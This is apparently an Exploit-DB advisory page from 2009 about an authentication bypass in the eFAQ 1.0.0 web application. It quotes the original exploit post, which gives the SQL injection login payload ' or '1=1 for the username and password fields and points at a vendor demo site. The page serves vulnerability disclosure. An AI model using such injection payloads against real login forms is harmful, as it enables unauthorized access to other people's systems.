eFAQ (Auth Bypass) SQL Injection Vulnerability

vendor:

eFAQ

by:

ByALBAYX

CVSS

HIGH

SQL Injection

CWE

Product Name: eFAQ

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

eFAQ (Auth Bypass) SQL Injection Vulnerability

eFAQ is prone to an authentication bypass vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to gain access to the application and perform unauthorized actions. This issue affects version 1.0.0; other versions may also be vulnerable.

Mitigation:

Users should never enter unsanitized input into an SQL query. Input should always be validated and filtered for malicious content.

Source

Exploit-DB raw data:

#------C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]eFAQ (Auth Bypass) SQL Injection Vulnerability

[~]Script        : eFAQ

[~]Price         : $49.95  save $50.00   :) 

[~]Demo          : http://faq.enthrallweb.us/

[~]eFAQ details  : http://enthrallweb.com/detail.asp?productID=7
#############################################
[~]username  : ' or '1=1

[~]password  : ' or '1=1
#############################################
[~]Ä°ÅŸinize BaqÄ±n :=)

[~]Greetz For C4TEAM Members
#############################################
Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M...
Onun derdini gÃ¶rdÃ¼m, derdime Ä°MRENDÄ°M...
----------
FilistiN

# milw0rm.com [2009-01-16]